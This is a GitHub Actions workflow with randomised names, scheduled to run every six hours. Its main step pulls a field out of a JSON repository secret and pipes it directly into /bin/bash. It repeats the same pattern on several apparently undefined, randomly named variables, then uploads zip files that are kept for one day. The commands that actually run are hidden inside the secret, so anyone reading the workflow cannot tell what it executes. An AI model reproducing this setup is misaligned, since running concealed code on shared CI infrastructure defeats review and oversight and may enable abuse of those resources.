name: zhihuangongkuai
on:
  workflow_dispatch:

  schedule:
    - cron: '47 0,6,12,18 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: zhihuangongkuai
        env:
          x1478: ${{ secrets.x1478 }}
        run: |
          printf '%s' "$x1478" | jq -r .qub69236 | /bin/bash
          echo $gydrz6499 | jq -r .ytrlj83 | /bin/bash
          echo $aykb2196 | jq -r .zrc1208 | /bin/bash
          echo $ait9423 | jq -r .yr9145 | /bin/bash
          echo $vqt9 | jq -r .r38519 | /bin/bash

      - name: Upload artifact
        uses: actions/upload-artifact@v4
        with:
          name: qjOhJayf
          path: "*.zip"
          retention-days: 1
